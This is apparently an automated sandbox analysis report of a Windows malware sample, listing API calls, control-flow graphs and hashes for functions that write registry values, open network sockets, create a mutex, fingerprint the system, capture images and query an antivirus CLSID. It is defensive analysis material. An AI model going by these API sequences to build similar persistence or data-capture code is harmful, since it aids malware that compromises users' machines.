                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 02C657AC
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 02C657C4
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C657CE
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C657FE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                                                                                      • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                                                                                      • API String ID: 354323817-737951744
                                                                                                                                                                      • Opcode ID: f9ae37a25ab619e99da680d8d334c621e1c974439dd3f6ba3d9827bb995ae706
                                                                                                                                                                      • Instruction ID: 8ba52572b471c42d9dc5758117341aca01abcd55b53e4630e5460a15f3d95477
                                                                                                                                                                      • Opcode Fuzzy Hash: f9ae37a25ab619e99da680d8d334c621e1c974439dd3f6ba3d9827bb995ae706
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B91D4B5A40204AFEB20DF60DC88FBA77BEFB85740F508659FA099B240D7749A44CF91
                                                                                                                                                                      Function 03779E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 488 3779e50-3779e85 GdipGetImagePixelFormat 489 3779e87 488->489 490 3779e8a-3779eb1 488->490 489->490 491 3779eb3-3779ec3 490->491 492 3779ec9-3779ecf 490->492 491->492 493 3779ed1-3779ee1 492->493 494 3779eeb-3779f04 GdipGetImageHeight 492->494 493->494 495 3779f06 494->495 496 3779f09-3779f2c GdipGetImageWidth 494->496 495->496 497 3779f31-3779f4e call 3779c30 496->497 498 3779f2e 496->498 501 377a055-377a05a 497->501 502 3779f54-3779f68 497->502 498->497 503 377a2a4-377a2ba call 377f00a 501->503 504 377a0cf-377a0d7 502->504 505 3779f6e-3779f87 GdipGetImagePaletteSize 502->505 509 377a0dd-377a11a GdipBitmapLockBits 504->509 510 377a20a-377a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 504->510 506 3779f8c-3779f98 505->506 507 3779f89 505->507 512 3779fb2-3779fba 506->512 513 3779f9a-3779fa5 call 3779650 506->513 507->506 515 377a11c-377a121 509->515 516 377a14a-377a177 509->516 511 377a281-377a283 510->511 517 377a285 511->517 518 377a2a2 511->518 522 3779fd0-3779fd5 call 3771280 512->522 523 3779fbc-3779fca call 377f673 512->523 513->512 537 3779fa7-3779fb0 call 378c660 513->537 524 377a123 515->524 525 377a140-377a145 515->525 519 377a1bf-377a1de GdipBitmapUnlockBits 516->519 520 377a179-377a18e call 37807f2 516->520 527 377a28d-377a2a0 call 377f639 517->527 518->503 519->511 530 377a1e4-377a1e7 519->530 542 377a200-377a205 call 3771280 520->542 543 377a190-377a197 520->543 534 3779fda-3779fe5 522->534 523->534 545 3779fcc-3779fce 523->545 532 377a12b-377a13e call 377f639 524->532 525->503 527->518 550 377a287 527->550 530->511 532->525 547 377a125 532->547 540 3779fe7-3779fe9 534->540 537->540 548 377a016-377a030 GdipGetImagePalette 540->548 549 3779feb-3779fed 540->549 542->510 543->542 551 377a1f6-377a1fb call 3771280 543->551 552 377a19e-377a1bd 543->552 553 377a1ec-377a1f1 call 3771280 543->553 545->540 547->532 557 377a032-377a038 548->557 558 377a03b-377a040 548->558 555 3779fef 549->555 556 377a00c-377a011 549->556 550->527 551->542 552->519 552->520 553->551 561 3779ff7-377a00a call 377f639 555->561 556->503 557->558 562 377a042-377a048 558->562 563 377a04a-377a050 call 377cca0 558->563 561->556 572 3779ff1 561->572 562->563 566 377a05f-377a063 562->566 563->501 567 377a065 566->567 568 377a0a0-377a0c9 call 3779d80 SetDIBColorTable call 377a320 566->568 570 377a068-377a098 567->570 568->504 570->570 573 377a09a 570->573 572->561 573->568
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779E7B
                                                                                                                                                                      • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779EFC
                                                                                                                                                                      • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779F24
                                                                                                                                                                      • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779F7F
                                                                                                                                                                      • _malloc.LIBCMT ref: 03779FC0
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • _free.LIBCMT ref: 0377A000
                                                                                                                                                                      • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0377A028
                                                                                                                                                                      • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0377A0B7
                                                                                                                                                                      • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0377A112
                                                                                                                                                                      • _free.LIBCMT ref: 0377A134
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 0377A183
                                                                                                                                                                      • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0377A1D0
                                                                                                                                                                      • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03795A78,00022009,?,00000000,?,00000000), ref: 0377A22C
                                                                                                                                                                      • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0377A24C
                                                                                                                                                                      • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0377A267
                                                                                                                                                                      • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0377A274
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0377A27B
                                                                                                                                                                      • _free.LIBCMT ref: 0377A296
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                                                                                      • String ID: &
                                                                                                                                                                      • API String ID: 640422297-3042966939
                                                                                                                                                                      • Opcode ID: ca23fb054b17ca01fa60f33de9e09feb229a511bdb8f42ac40e5d4b3cc464c15
                                                                                                                                                                      • Instruction ID: ca6a6e2576496fabb0241c64b02ae306b62fc75a33b63ea3e1c08149c94746ae
                                                                                                                                                                      • Opcode Fuzzy Hash: ca23fb054b17ca01fa60f33de9e09feb229a511bdb8f42ac40e5d4b3cc464c15
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CD131B1A002199FDB64DF55CC84BAAB7B4EF88304F0485ADE709A7301D774AA85CFA5
                                                                                                                                                                      Function 03772DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 03772DBB
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03772DC7
                                                                                                                                                                      • timeGetTime.WINMM ref: 03772DCD
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 03772DFA
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03772E26
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03772E32
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03772E51
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03772E5D
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 03772E6B
                                                                                                                                                                      • htons.WS2_32(?), ref: 03772E8D
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 03772EAB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                      • String ID: 0u
                                                                                                                                                                      • API String ID: 640718063-3203441087
                                                                                                                                                                      • Opcode ID: 3b5e36fd818848402e926f799c5613c9f2da94b79850b242be8e6d665ef17584
                                                                                                                                                                      • Instruction ID: cf604104ba9c1519b54481c0405767397d2270e351081f7668072620f447bad5
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b5e36fd818848402e926f799c5613c9f2da94b79850b242be8e6d665ef17584
                                                                                                                                                                      • Instruction Fuzzy Hash: 34615371A40308BFD720EFA4DC45FAAB7B8FF4C710F10461AF655AB2D1D6B4A9058B64
                                                                                                                                                                      Function 02C62D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C62D9B
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C62DA7
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C62DAD
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 02C62DDA
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02C62E06
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C62E12
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02C62E31
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C62E3D
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 02C62E4B
                                                                                                                                                                      • htons.WS2_32(?), ref: 02C62E6D
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 02C62E8B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                      • String ID: 0u
                                                                                                                                                                      • API String ID: 640718063-3203441087
                                                                                                                                                                      • Opcode ID: a1ca45a2228b19abe9a10cfc8c5aad20fbb87cea7147010d1cf6c59061239e2c
                                                                                                                                                                      • Instruction ID: 4d31dec15080dc749b7db859735ce05d205747bb6bd8011a4c7c498d9d826ee0
                                                                                                                                                                      • Opcode Fuzzy Hash: a1ca45a2228b19abe9a10cfc8c5aad20fbb87cea7147010d1cf6c59061239e2c
                                                                                                                                                                      • Instruction Fuzzy Hash: CD6144B1A40704AFE720DFA4DC85FAAB7B9FF48711F504619FA46A72C0D7B0A904CB65
                                                                                                                                                                      Function 0377AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 656 377ad10-377ad2b 657 377ad84-377ad8f 656->657 658 377ad2d-377ad5b RegOpenKeyExW 656->658 661 377b845-377b84b call 377ce00 657->661 662 377ad95-377ad9c 657->662 659 377ad5d-377ad73 RegQueryValueExW 658->659 660 377ad79-377ad7e 658->660 659->660 660->657 664 377b84e-377b854 660->664 661->664 665 377afe3-377b09b call 377f707 call 3786770 call 377eff4 call 3787660 call 377f707 call 377cf20 call 377eff4 662->665 666 377adea-377adf1 662->666 711 377b162-377b189 call 377fa29 CloseHandle 665->711 712 377b0a1-377b0ee call 3787660 RegCreateKeyW 665->712 666->664 669 377adf7-377ae29 call 377f707 call 3786770 666->669 678 377ae42-377ae4e 669->678 679 377ae2b-377ae3f wsprintfW 669->679 681 377ae50 678->681 682 377ae9a-377aef1 call 377eff4 call 3787660 call 3772ba0 call 377efff * 2 678->682 679->678 684 377ae54-377ae5f 681->684 687 377ae60-377ae66 684->687 690 377ae86-377ae88 687->690 691 377ae68-377ae6b 687->691 697 377ae8b-377ae8d 690->697 695 377ae82-377ae84 691->695 696 377ae6d-377ae75 691->696 695->697 696->690 700 377ae77-377ae80 696->700 701 377aef4-377af09 697->701 702 377ae8f-377ae98 697->702 700->687 700->695 706 377af10-377af16 701->706 702->682 702->684 709 377af36-377af38 706->709 710 377af18-377af1b 706->710 716 377af3b-377af3d 709->716 714 377af32-377af34 710->714 715 377af1d-377af25 710->715 733 377b0f0-377b13f call 377eff4 call 3775a30 RegDeleteValueW RegSetValueExW 712->733 734 377b14a-377b15f RegCloseKey call 377fac9 712->734 714->716 715->709 720 377af27-377af30 715->720 721 377af3f-377af41 716->721 722 377afae-377afe0 call 377fa29 CloseHandle call 377efff 716->722 720->706 720->714 723 377af55-377af5c 721->723 724 377af43-377af4e call 377efff 721->724 731 377af70-377af74 723->731 732 377af5e-377af69 call 377fac9 723->732 724->723 739 377af76-377af7f call 377efff 731->739 740 377af85-377afa9 call 377f020 731->740 732->731 733->734 752 377b141-377b147 call 377fac9 733->752 734->711 739->740 740->682 752->734
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0377AD53
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0377AD73
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenQueryValue
                                                                                                                                                                      • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                                                                                      • API String ID: 4153817207-1338088003
                                                                                                                                                                      • Opcode ID: af5279f64d0b62e7471047293b3e3d9cb2a6b6c09cfa9a9d8a6a71404a962f3a
                                                                                                                                                                      • Instruction ID: fe9118c6984f62d37b4bfb2291ef9f7fa9989bbe07e3ce37d0ec07c6db5b1432
                                                                                                                                                                      • Opcode Fuzzy Hash: af5279f64d0b62e7471047293b3e3d9cb2a6b6c09cfa9a9d8a6a71404a962f3a
                                                                                                                                                                      • Instruction Fuzzy Hash: B4C1F6B6A00300ABEB10EF24DC45F6B73A8EF94714F084569F9459B382E775E905C7A2
                                                                                                                                                                      Function 03775F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03775F66
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03775F6E
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 03775F85
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03775F90
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03775F92
                                                                                                                                                                      • _memset.LIBCMT ref: 03775FB9
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 03775FC6
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,03795328), ref: 03775FED
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 03775FF8
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 03776005
                                                                                                                                                                      • GetConsoleWindow.KERNEL32 ref: 0377600F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                                                                                      • String ID: 2024.12. 3$key$open
                                                                                                                                                                      • API String ID: 2922109467-4129338558
                                                                                                                                                                      • Opcode ID: 11db658df9268671dd418f1652a25977622b4187f21528df5656d4cee96403b0
                                                                                                                                                                      • Instruction ID: 18af511dffe48ca81c5b52ffb1ff30f1f1b801b51fcded050f7255d36a40dbb1
                                                                                                                                                                      • Opcode Fuzzy Hash: 11db658df9268671dd418f1652a25977622b4187f21528df5656d4cee96403b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 17213772A0430DAFEA10FB64EC45F5E73A89B84714F144A2AE6049B1C5DB74E50AC7A3
                                                                                                                                                                      Function 037762B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 814 37762b6-37762bd 815 37762c0-3776363 call 3786770 wsprintfW RegOpenKeyExW 814->815 818 37763e9-37763ff 815->818 819 3776369-3776376 call 3786770 815->819 822 3776402-3776404 818->822 821 377637b-37763ba RegQueryValueExW 819->821 823 37763dc-37763e3 RegCloseKey 821->823 824 37763bc-37763da lstrcatW * 2 821->824 822->815 825 377640a-3776418 822->825 823->818 824->823 826 3776422-377642f lstrlenW 825->826 827 377641a-377641f 825->827 828 3776441-3776450 826->828 829 3776431-377643b lstrcatW 826->829 827->826 830 3776452-3776457 828->830 831 377645a-377647a call 377f00a 828->831 829->828 830->831
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 037762CE
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776336
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0377635F
                                                                                                                                                                      • _memset.LIBCMT ref: 03776376
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 037763B2
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,?), ref: 037763CE
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,0379535C), ref: 037763DA
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 037763E3
                                                                                                                                                                      • lstrlenW.KERNEL32(037A1F10,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 03776427
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,037953D4,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 0377643B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                                                                                      • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                      • API String ID: 1671694837-1583895642
                                                                                                                                                                      • Opcode ID: 3d003c6c4eab97002231a8ea2db771e6768a122c79dc14e202ea50983ddaf006
                                                                                                                                                                      • Instruction ID: 019c36a47af499598a0b4a3c5d822704b1ec585861d2dd1c96961303bc236a9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3d003c6c4eab97002231a8ea2db771e6768a122c79dc14e202ea50983ddaf006
                                                                                                                                                                      • Instruction Fuzzy Hash: 4241A1F1A40668AEDB24DB54CC55FEEB7B8AB88704F0442C9F309A7186D6749B81CF64
                                                                                                                                                                      Function 03777490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03775611,0000035E,000002FA), ref: 0377749C
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 037774B2
                                                                                                                                                                      • swprintf.LIBCMT ref: 037774EF
                                                                                                                                                                        • Part of subcall function 03777410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03777523), ref: 0377743D
                                                                                                                                                                        • Part of subcall function 03777410: GetProcAddress.KERNEL32(00000000), ref: 03777444
                                                                                                                                                                        • Part of subcall function 03777410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03777523), ref: 03777452
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03777547
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03777563
                                                                                                                                                                      • RegCloseKey.KERNEL32(000002FA), ref: 03777586
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,03775611,0000035E,000002FA), ref: 03777598
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                                                                                      • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                                                                                      • API String ID: 2158625971-3190923360
                                                                                                                                                                      • Opcode ID: 8cf36512839cd01f0dcef8deb1bea09f4621f6e43b924f96e24ccda8cba9e670
                                                                                                                                                                      • Instruction ID: 547f32ca5abd7d5bbe8924fcb723ddc18e6f214eaa0effda0bbbf92dd46c7da3
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cf36512839cd01f0dcef8deb1bea09f4621f6e43b924f96e24ccda8cba9e670
                                                                                                                                                                      • Instruction Fuzzy Hash: 3031B3B5A40308BBEF18EBA4DD45EBF7B7DDB48640F14461AFA05A6146E674DA00C7A0
                                                                                                                                                                      Function 0377C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,?,A0516FA3,?,00000000,?), ref: 0377C09E
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0377C0AA
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0377C0BF
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0377C0D5
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64), ref: 0377C113
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64), ref: 0377C124
                                                                                                                                                                        • Part of subcall function 03779DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03779E04
                                                                                                                                                                        • Part of subcall function 03779DE0: GdipDisposeImage.GDIPLUS(?), ref: 03779E18
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0377C14C
                                                                                                                                                                        • Part of subcall function 0377A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0377A48D
                                                                                                                                                                        • Part of subcall function 0377A460: _free.LIBCMT ref: 0377A503
                                                                                                                                                                      • GetHGlobalFromStream.OLE32(?,?), ref: 0377C16D
                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 0377C177
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0377C18F
                                                                                                                                                                        • Part of subcall function 03779BA0: DeleteObject.GDI32(?), ref: 03779BD2
                                                                                                                                                                        • Part of subcall function 03779BA0: EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BE3
                                                                                                                                                                        • Part of subcall function 03779BA0: EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BF8
                                                                                                                                                                        • Part of subcall function 03779BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03779B7B), ref: 03779C04
                                                                                                                                                                        • Part of subcall function 03779BA0: LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C15
                                                                                                                                                                        • Part of subcall function 03779BA0: LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C1C
                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 0377C1A5
                                                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 0377C221
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0377C249
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
